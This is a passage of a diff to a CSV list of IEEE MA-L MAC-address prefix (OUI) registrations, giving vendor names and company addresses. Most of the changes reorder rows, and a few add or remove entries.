1-2, Building 9, Anzhen Xili District 3, Chaoyang District, Beijing Beijing CN 100029 " MA-L,ACC9FF,"Realme Chongqing Mobile Telecommunications Corp.,Ltd.","No.178 Yulong Avenue, Yufengshan, Yubei District, Chongqing. Chongqing China CN 401120 " MA-L,80E769,"Realme Chongqing Mobile Telecommunications Corp.,Ltd.","No.178 Yulong Avenue, Yufengshan, Yubei District, Chongqing. Chongqing China CN 401120 " MA-L,94BA06,SHENZHEN BILIAN ELECTRONIC CO.,LTD,"NO.268, Fuqian Rd, Jutang community, Guanlan Town, Longhua New district shenzhen guangdong CN 518000 " MA-L,AC017A,"Sichuan Tianyi Comheart Telecom Co.,LTD","No.198,First Section,Snow Mountain Avenue, Jinyuan Town, Dayi County Chengdu Sichuan CN 611330 " -MA-L,58E6C5,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " -MA-L,08736F,EM Microelectronic,Rue des Sors 3 Marin-Epagnier Neuchatel CH 2074 +MA-L,CCBABD,TP-Link Systems Inc.,10 Mauchly Irvine CA US 92618 MA-L,780F81,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 +MA-L,5CE753,Private, MA-L,B41F4D,Sony Interactive Entertainment Inc.,1-7-1 Konan Minato-ku Tokyo JP 108-0075 MA-L,E89E49,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " MA-L,148F79,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 @@ -7544,40 +7543,41 @@ MA-L,685EDD,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,F8D3F0,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,A02B44,WaveGo Tech LLC,"16192 CoastalHighway, Lewes,Sussex.DE 19958 Lewes DE US 19958 " MA-L,00D626,"Mist Systems, Inc.","1601 South De Anza Blvd, Suite 248 Cupertino CA US 95014 " +MA-L,08736F,EM Microelectronic,Rue des Sors 3 Marin-Epagnier Neuchatel CH 2074 MA-L,C89009,Budderfly Inc.,2 Trap Falls Road Shelton CT US 06484 MA-L,F8F7D2,"Equal Optics, LLC",2280 University Drive. Ste 102 Newport Beach CA US 92660 -MA-L,904C02,"vivo Mobile Communication Co., Ltd.","No.1, vivo Road, Chang'an Dongguan Guangdong CN 523860 " -MA-L,041FB8,"vivo Mobile Communication Co., Ltd.","No.1, vivo Road, Chang'an Dongguan Guangdong CN 523860 " MA-L,A47B52,"JoulWatt Technology Co., Ltd","9th Floor, Chuangye Building, No.99 Huaxing Road, Xihu District, Hangzhou, China Hangzhou Zhejiang CN 311100 " -MA-L,4409C6,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " -MA-L,3CC5C7,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,30C9CC,"Samsung Electronics Co.,Ltd","129, Samsung-ro, Youngtongl-Gu Suwon Gyeonggi-Do KR 16677 " +MA-L,3CC5C7,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " +MA-L,4409C6,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,0455B2,"Huaqin Technology Co.,Ltd",Pudong New Area Shanghai CN 201203 -MA-L,1CD3AF,LG Innotek,"26, HANAMSANDAN 5BEON-RO Gwangju Gwangsan-gu KR 506-731 " -MA-L,C826E2,CHINA DRAGON TECHNOLOGY LIMITED,"B4 Building,No.3 First industrial Zone,Nanpu Road,Lao Community,Xinqian Street,Baoan District,Shenzhen,City ShenZhen CN 518100 " MA-L,FC4CEA,Dell Inc.,One Dell Way Round Rock TX US 78682 MA-L,3CB6E7,"Handheld Scientific, Inc.",5201 Great America Pkwy Suite 320 Santa Clara CA US 95054 +MA-L,1CD3AF,LG Innotek,"26, HANAMSANDAN 5BEON-RO Gwangju Gwangsan-gu KR 506-731 " MA-L,F44EB4,CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.,"B22 Building,NO.51 Tongle Road, Shajing Town, Jiangnan District, Nanning, Guangxi Province, China Nanning Guangxi CN 530007 " -MA-L,F4AB5C,"Quectel Wireless Solutions Co.,Ltd.","7th Floor, Hongye Building, No.1801 Hongmei Road, Xuhui District Shanghai CN 200233 " +MA-L,904C02,"vivo Mobile Communication Co., Ltd.","No.1, vivo Road, Chang'an Dongguan Guangdong CN 523860 " +MA-L,041FB8,"vivo Mobile Communication Co., Ltd.","No.1, vivo Road, Chang'an Dongguan Guangdong CN 523860 " MA-L,80AE3C,Taicang T&W Electronics,89# Jiang Nan RD Suzhou Jiangsu CN 215412 MA-L,F06FCE,Ruckus Wireless,350 West Java Drive Sunnyvale CA US 94089 -MA-L,A01B9E,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " -MA-L,D87154,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " -MA-L,7833C6,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " -MA-L,2CC1F4,Nokia Solutions and Networks India Private Limited,"Plot 45, Fathima Nagar, Nemilicherry Chennai Tamilnadu IN 600044 " MA-L,34FD70,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,4CBB47,NVIDIA Corporation,2701 San Tomas Expressway Santa Clara CA US 95050 MA-L,B07C8E,"Brother Industries, LTD.","15-1, Naeshirocho, Mizuho-ku NAGOYA JP 4678561 " -MA-L,F07A55,zte corporation,"12/F.,zte R&D building ,kejinan Road,Shenzhen,P.R.China shenzhen guangdong CN 518057 " -MA-L,D46195,zte corporation,"12/F.,zte R&D building ,kejinan Road,Shenzhen,P.R.China shenzhen guangdong CN 518057 " +MA-L,A01BD6,Nautitech Mining Systems Pty. Ltd.,3/9 Packard Avenue Castle Hill CASTLE HILL AU 2154 +MA-L,90F005,"Xi'an Molead Technology Co., Ltd","No.34 Fenghui South Road,High-Tech Zone Xian Shaanxi CN 710065 " +MA-L,A01B9E,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " +MA-L,D87154,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " +MA-L,7833C6,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " +MA-L,C826E2,CHINA DRAGON TECHNOLOGY LIMITED,"B4 Building,No.3 First industrial Zone,Nanpu Road,Lao Community,Xinqian Street,Baoan District,Shenzhen,City ShenZhen CN 518100 " MA-L,E0D55D,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,E44AE0,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,A08527,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " -MA-L,90F005,"Xi'an Molead Technology Co., Ltd","No.34 Fenghui South Road,High-Tech Zone Xian Shaanxi CN 710065 " -MA-L,A01BD6,Nautitech Mining Systems Pty. Ltd.,3/9 Packard Avenue Castle Hill CASTLE HILL AU 2154 -MA-L,6073C8,"Voyetra Turtle Beach, Inc.","15822 Bernardo Center Drive, Suite 105 San Diego CA US 92127 " +MA-L,F07A55,zte corporation,"12/F.,zte R&D building ,kejinan Road,Shenzhen,P.R.China shenzhen guangdong CN 518057 " +MA-L,D46195,zte corporation,"12/F.,zte R&D building ,kejinan Road,Shenzhen,P.R.China shenzhen guangdong CN 518057 " +MA-L,F4AB5C,"Quectel Wireless Solutions Co.,Ltd.","7th Floor, Hongye Building, No.1801 Hongmei Road, Xuhui District Shanghai CN 200233 " +MA-L,2CC1F4,Nokia Solutions and Networks India Private Limited,"Plot 45, Fathima Nagar, Nemilicherry Chennai Tamilnadu IN 600044 " MA-L,5CE1A4,Pleneo,9 RAFFLES PLACE #29-05 REPUBLIC PLAZA SG SG 00000 MA-L,FCE498,IEEE Registration Authority,445 Hoes Lane Piscataway NJ US 08554 +MA-L,6073C8,"Voyetra Turtle Beach, Inc.","15822 Bernardo Center Drive, Suite 105 San Diego CA US 92127 " MA-L,24B5B9,"Motorola Mobility LLC, a Lenovo Company",222 West Merchandise Mart Plaza Chicago IL US 60654 MA-L,E467DD,ELA INNOVATION,297 RUE MAURICE BEJART MONTPELLIER FR 34080 MA-L,FC9D05,"Micro-Star INTL CO., LTD.","No.69, Lide St., Zhonghe Dist., New Taipei City TW 235 " @@ -14939,33 +14939,37 @@ MA-L,74D5B8,Infraeo Inc,101 E Old Settlers Blvd #160 Round Rock TX US 78664 MA-L,2C3F0B,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 MA-L,A4AD9E,NEXAIOT,"13F., No. 922, Zhongzheng Rd., Zhonghe Dist New Taipei City TW 235 " MA-L,94742E,"MERCUSYS TECHNOLOGIES CO., LTD.","3F,Zone B,Building R1,High-Tech Industrial Village,No.023 High-Tech South 4 Road,Nanshan,Shenzhen Shenzhen Guangdong CN 518057 " -MA-L,94EF50,TP-Link Systems Inc.,10 Mauchly Irvine CA US 92618 -MA-L,903FC3,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone Dongguan Guangdong CN 523808 " MA-L,A80CCA,Shenzhen Sundray Technologies company Limited,"6th Floor,Block A1, Nanshan iPark, No.1001 XueYuan Road, Nanshan District Shenzhen Guangdong CN 518057 " MA-L,703A73,Shenzhen Sundray Technologies company Limited,"6th Floor,Block A1, Nanshan iPark, No.1001 XueYuan Road, Nanshan District Shenzhen Guangdong CN 518057 " MA-L,202027,Shenzhen Sundray Technologies company Limited,"5th Floor, Block A4, Nanshan ipark,NO.1001 Xue Yuan Road, Nanshan District, Shenzhen 518055, P.R. China Shenzhen Guangdong CN 518057 " +MA-L,903FC3,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone Dongguan Guangdong CN 523808 " MA-L,C4493E,"Motorola Mobility LLC, a Lenovo Company",222 West Merchandise Mart Plaza Chicago IL US 60654 +MA-L,94EF50,TP-Link Systems Inc.,10 Mauchly Irvine CA US 92618 MA-L,FCA2DF,IEEE Registration Authority,445 Hoes Lane Piscataway NJ US 08554 MA-L,CC6200,"Honor Device Co., Ltd.","Suite 3401, Unit A, Building 6, Shum Yip Sky Park, No. 8089, Hongli West Road, Xiangmihu Street, Futian District Shenzhen Guangdong CN 518040 " MA-L,54EAE1,"Honor Device Co., Ltd.","Suite 3401, Unit A, Building 6, Shum Yip Sky Park, No. 8089, Hongli West Road, Xiangmihu Street, Futian District Shenzhen Guangdong CN 518040 " MA-L,7C692B,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,386EB2,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " -MA-L,18CEDF,"Quectel Wireless Solutions Co.,Ltd.","7th Floor, Hongye Building, No.1801 Hongmei Road, Xuhui District Shanghai CN 200233 " -MA-L,00337A,Tuya Smart Inc.,"160 Greentree Drive, Suite 101 Dover DE US 19904 " -MA-L,C0544D,"Nokia Shanghai Bell Co., Ltd.","No.388 Ning Qiao Road,Jin Qiao Pudong Shanghai Shanghai CN 201206 " -MA-L,CCCE1E,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 -MA-L,7CFF4D,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,7CC882,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,3CA62F,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,3C3712,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,0C7274,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,04B4FE,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,C0544D,"Nokia Shanghai Bell Co., Ltd.","No.388 Ning Qiao Road,Jin Qiao Pudong Shanghai Shanghai CN 201206 " +MA-L,CCCE1E,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,7CFF4D,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,60577D,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,ACEC85,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,0C1C1A,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,64C269,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,74B6B6,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,30578E,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,F021E0,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,4C0143,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,F8BBBF,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,00AB48,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,7CC882,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " +MA-L,18CEDF,"Quectel Wireless Solutions Co.,Ltd.","7th Floor, Hongye Building, No.1801 Hongmei Road, Xuhui District Shanghai CN 200233 " +MA-L,00337A,Tuya Smart Inc.,"160 Greentree Drive, Suite 101 Dover DE US 19904 " MA-L,481F66,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,0815AE,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,F4BFBB,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " @@ -14976,36 +14980,36 @@ MA-L,FC2E19,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xiche MA-L,6C0F0B,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,EC9B2D,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,DC152D,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,60577D,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,ACEC85,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,0C1C1A,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,64C269,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,7093C1,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,64DAED,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,7C5E98,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,60F419,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,54926A,"GD Midea Air-Conditioning Equipment Co.,Ltd.","Midea Global Innovation Center,Beijiao Town,Shunde Foshan Guangdong CN 528311 " MA-L,0C93A5,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,A8130B,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,8CDD0B,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,B83FD2,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " MA-L,A41B34,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,B4B9E6,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,707DA1,Sagemcom Broadband SAS,"250, route de l'Empereur Rueil Malmaison Cedex hauts de seine FR 92848 " MA-L,D83EEF,COOSEA GROUP (HK) COMPANY LIMITED,"Unit 56 16F Multifield Plaza,37A Part Avenue.Tsim Sha Tsui,KL,Hong Kong,SAR CHINA Hong Kong CN 999077 " +MA-L,707DA1,Sagemcom Broadband SAS,"250, route de l'Empereur Rueil Malmaison Cedex hauts de seine FR 92848 " MA-L,04585D,IEEE Registration Authority,445 Hoes Lane Piscataway NJ US 08554 MA-L,D0789A,Vantiva - Connected Home,"4855 Peachtree Industrial Blvd, Suite 200 Norcross GA US 30902 " MA-L,C4864F,Beijing BitIntelligence Information Technology Co. Ltd.,"Room 708, Founder International Building, No. 52, North Fourth Ring West Road, Haidian District Beijing Beijing CN 100080 " -MA-L,54926A,"GD Midea Air-Conditioning Equipment Co.,Ltd.","Midea Global Innovation Center,Beijiao Town,Shunde Foshan Guangdong CN 528311 " +MA-L,E0E6E3,TeamF1 Networks Pvt Limited,"Ascendas IT Park, Capella Block, Floor #2, Plot No: 17, Software Units Layout, Madhapur Hyderabad Telangana IN 500081 " MA-L,C87F2B,INGRAM MICRO SERVICES,100 CHEMIN DE BAILLOT MONTAUBAN FR 82000 MA-L,788E45,Jizaie inc.," Inspired.Lab 569 Otemachi Building 5F, 1-6-1 Otemachi, Chiyoda-ku, Tokyo 100-0004 Tokyo Tokyo JP 100-0004 " MA-L,4CFAC9,BWS IoT,"Calçada Acácias, 31 Barueri Sao Paulo BR 06453-054 " MA-L,682499,"Quectel Wireless Solutions Co.,Ltd.","7th Floor, Hongye Building, No.1801 Hongmei Road, Xuhui District Shanghai CN 200233 " MA-L,303B49,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 -MA-L,E0E6E3,TeamF1 Networks Pvt Limited,"Ascendas IT Park, Capella Block, Floor #2, Plot No: 17, Software Units Layout, Madhapur Hyderabad Telangana IN 500081 " MA-L,34FA1C,"Beijing Xiaomi Mobile Software Co., Ltd","The Rainbow City Office Building, 68 Qinghe Middle Street Haidian District Beijing Beijing CN 100085 " MA-L,2876CD,"Funshion Online Technologies Co.,Ltd","2101, Floor 1-2, Building 9, Anzhen Xili District 3, Chaoyang District, Beijing Beijing CN 100029 " +MA-L,4435B9,NetComm Wireless Pty Ltd,"Level 1, 18-20 Orion Road Sydney NSW AU 2066 " MA-L,4CCF7C,HP Inc.,10300 Energy Dr Spring TX US 77389 +MA-L,DCBB3D,Extreme Networks Headquarters,2121 RDU Center Drive Morrisville US 27560 MA-L,203A0C,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,FCB214,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 +MA-L,2C9520,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,0015FF,"Inseego Wireless, Inc","9710 Scranton Rd., Suite 200 San Diego CA US 92121 " MA-L,2880A2,"Inseego Wireless, Inc","9710 Scranton Rd., Suite 200 San Diego CA US 92121 " MA-L,18EE86,"Inseego Wireless, Inc","9710 Scranton Rd., Suite 200 San Diego CA US 92121 " @@ -15013,24 +15017,22 @@ MA-L,20F4D4,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,30C0AE,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,F8E252,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,FC9F2A,Zyxel Communications Corporation,"No. 6 Innovation Road II, Science Park Hsichu Taiwan TW 300 " -MA-L,4435B9,NetComm Wireless Pty Ltd,"Level 1, 18-20 Orion Road Sydney NSW AU 2066 " MA-L,6475DA,Arcadyan Corporation,"No.8, Sec.2, Guangfu Rd. Hsinchu City Hsinchu TW 30071 " -MA-L,DCBB3D,Extreme Networks Headquarters,2121 RDU Center Drive Morrisville US 27560 MA-L,B0CCCE,IEEE Registration Authority,445 Hoes Lane Piscataway NJ US 08554 +MA-L,DCB4D9,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " +MA-L,983268,Silicon Laboratories, 400 West Cesar Chavez Austin TX US 78701 MA-L,B89C13,Alps Alpine,"20-1, Yoshima Industrial Park Iwaki Fukushima JP 970-1192 " MA-L,BC76F9,Ubiquoss Inc,"8F Ubiquoss B/D, 68, Pangyo-ro 255beon-gil, Bundang-gu Seongnam-si Gyeonggi-do KR 463-400 " MA-L,24D1A1,"Shenzhen Cultraview Digital Technology Co., Ltd","F6,M6,Maqueling, High-tech park, Nanshan district Shenzhen Guangdong CN 518057 " MA-L,449FDA,Silicon Laboratories, 400 West Cesar Chavez Austin TX US 78701 MA-L,A81F79,Yingling Innovations Pte. Ltd.,24 Sin Ming Lane #06-97 Midview SG 573970 -MA-L,FCB214,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 -MA-L,2C9520,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,802395,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 -MA-L,983268,Silicon Laboratories, 400 West Cesar Chavez Austin TX US 78701 -MA-L,DCB4D9,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " -MA-L,EC7CBA,Hewlett Packard Enterprise ,1701 E Mossy Oaks Rd Spring TX US 77389 -MA-L,0CA2F4,Chameleon Technology (UK) Limited,"1st Floor, Central House Otley Road Beckwith Knowle Harrogate GB HG3 1UF " MA-L,048F00,"Rong-Paisa Electronics Co., Ltd.",Carrera 43f #14A-112 Medellin Antioquia CO 050021 MA-L,8C5C53,AltoBeam Inc.,"B808, Tsinghua Tongfang Hi-Tech Plaza, Haidian Beijing Beijing CN 100083 " +MA-L,EC7CBA,Hewlett Packard Enterprise ,1701 E Mossy Oaks Rd Spring TX US 77389 +MA-L,0CA2F4,Chameleon Technology (UK) Limited,"1st Floor, Central House Otley Road Beckwith Knowle Harrogate GB HG3 1UF " +MA-L,502E91,AzureWave Technology Inc.,"8F., No. 94, Baozhong Rd. New Taipei City Taiwan TW 231 " +MA-L,E49F7D,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " MA-L,E8BFE1,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,644A7D,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,AC3DCB,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " @@ -15039,10 +15041,8 @@ MA-L,B43A96,Arista Networks,5453 Great America Parkway Santa Clara CA US 95054 MA-L,94CDFD,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,74675F,"COMPAL INFORMATION(KUNSHAN)CO.,LTD."," NO. 25, THE 3RD Street KUNSHAN EXPORT PROCESSING ZON KUNSHAN SUZHOU CN 215300 " MA-L,6C2F1C,Nexus Raytek Pty Ltd,160/425 Smith Street Fitzroy Victoria AU 3065 -MA-L,E49F7D,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " MA-L,609849,Nokia Solutions and Networks India Private Limited,"Radiance Ivy terrace, Block 4, 9R, Egattur, Chennai Chennai TamilNadu IN 600130 " MA-L,846EBC,Nokia Solutions and Networks India Private Limited,"Radiance Ivy terrace, Block 4, 9R, Egattur, Chennai Chennai TamilNadu IN 600130 " -MA-L,502E91,AzureWave Technology Inc.,"8F., No. 94, Baozhong Rd. New Taipei City Taiwan TW 231 " MA-L,68F7D8,Microsoft Corporation,One Microsoft Way REDMOND WA US 98052 MA-L,BC89A6,"Nintendo Co.,Ltd","11-1 HOKOTATE-CHO KAMITOBA,MINAMI-KU KYOTO KYOTO JP 601-8501 " MA-L,C0CDD6,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " @@ -22463,18 +22463,17 @@ MA-L,8CBAFC,JOYNEXT GmbH,Gewerbepark Merbitz 5 Dresden Saxony DE 01156 MA-L,1897F1,"KOSTAL (Shanghai) Management Co., Ltd.","No. 189, Xingping Road, Jiading District, Shanghai, P.R.China Shanghai Shanghai CN 201822 " MA-L,F4F50B,TP-Link Systems Inc.,10 Mauchly Irvine CA US 92618 MA-L,040F66,TP-Link Systems Inc.,10 Mauchly Irvine CA US 92618 -MA-L,3456FE,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 -MA-L,B80756,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 MA-L,A4D530,Avaya LLC,350 Mt Kimble Morristown NJ US 07960 +MA-L,3456FE,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 +MA-L,4CEF56,Shenzhen Sundray Technologies company Limited,"5th Floor, Block A4, Nanshan ipark,NO.1001 Xue Yuan Road, Nanshan District, Shenzhen 518055, P.R. China Shenzhen Guangdong CN 518057 " MA-L,941457,Shenzhen Sundray Technologies company Limited,"5th Floor, Block A4, Nanshan ipark,NO.1001 Xue Yuan Road, Nanshan District, Shenzhen 518055, P.R. China Shenzhen Guangdong CN 518057 " MA-L,ACFC82,Shenzhen Sundray Technologies company Limited,"5th Floor, Block A4, Nanshan ipark,NO.1001 Xue Yuan Road, Nanshan District, Shenzhen 518055, P.R. China Shenzhen Guangdong CN 518057 " MA-L,C8A23B,Shenzhen Sundray Technologies company Limited,"5th Floor, Block A4, Nanshan ipark,NO.1001 Xue Yuan Road, Nanshan District, Shenzhen 518055, P.R. China Shenzhen Guangdong CN 518057 " -MA-L,7C152D,Renesas Electronics (Penang) Sdn. Bhd.,"Phase 3, Bayan Lepas FIZ Bayan Lepas Penang MY 11900 " -MA-L,D8F12E,TP-Link Systems Inc.,10 Mauchly Irvine CA US 92618 MA-L,A0885E,"Anhui Xiangyao New Energy Technology Co., Ltd.","No. 2, District 4, Intelligent Industrial Park, South District, Lieshan Economic Development Zone Huaibei City Anhui Province CN 235065 " -MA-L,4CEF56,Shenzhen Sundray Technologies company Limited,"5th Floor, Block A4, Nanshan ipark,NO.1001 Xue Yuan Road, Nanshan District, Shenzhen 518055, P.R. China Shenzhen Guangdong CN 518057 " +MA-L,7C152D,Renesas Electronics (Penang) Sdn. Bhd.,"Phase 3, Bayan Lepas FIZ Bayan Lepas Penang MY 11900 " MA-L,A4DB4C,RAI Institute,145 Broadway Cambridge MA US 02142 MA-L,34BC5E,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,B80756,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 MA-L,F8EFB1,"Hangzhou Zhongxinhui lntelligent Technology Co.,Ltd.","Room 809, Building B, No. 567 Yueming Road, Xixing Street, Hangzhou Binjiang Distric CN 310000 " MA-L,2C91AB,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,DC15C8,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 @@ -22486,21 +22485,17 @@ MA-L,008497,"Shenzhen MiaoMing Intelligent Technology Co.,Ltd","3F, Building 2, MA-L,287AB4,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,78DC87,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,E00855,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 -MA-L,103D3E,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " +MA-L,D8F12E,TP-Link Systems Inc.,10 Mauchly Irvine CA US 92618 MA-L,90473C,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,74ADB7,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,78C313,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,CC5CDE,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,0C14D2,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,781053,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,94BE09,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,BC9E2C,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,C80C53,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,544DD4,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,C02D2E,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,7089CC,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,B4D0A9,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,AC710C,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " 